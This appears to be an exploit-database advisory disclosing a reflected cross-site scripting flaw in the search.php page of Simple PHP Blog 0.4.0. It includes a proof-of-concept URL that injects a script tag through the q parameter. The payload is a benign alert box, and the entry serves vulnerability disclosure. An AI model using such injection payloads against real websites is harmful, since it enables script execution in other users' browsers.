Simple PHP Blog 0.4.0 Cross Site Scripting Vulnerability

2016-11-08T00:00:00
ID 1337DAY-ID-26259
Type zdt
Reporter Boumediene Kaddour
Modified 2016-11-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+] Credits: Boumediene KADDOUR AKA sh311c0d3r

[+] Website: http://www.pentestingskills.com

Vendor:
======================
http://www.simpleblogphp.com


Product:
===============================
Simple PHP Blog 0.4.0


Vulnerability Type:
=============================
Cross Site Scripting (XSS)


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
The search bar on the search.php script doesn't properly sanitize user
supplied data, which
causes the script to be prone to a cross site scripting that in turns
allows an attacker to execute
JS instructions on the client side.


Exploit code(s):
================

http://192.168.43.167/internal/blog/search.php?q=%3Cscript%3Ealert%28%22SickApp%22%29%3C%2Fscript%3E


Disclosure:
=============================================
November 07/11/2016 : Public Disclosure


sh311c0d3r

#  0day.today [2018-03-01]  #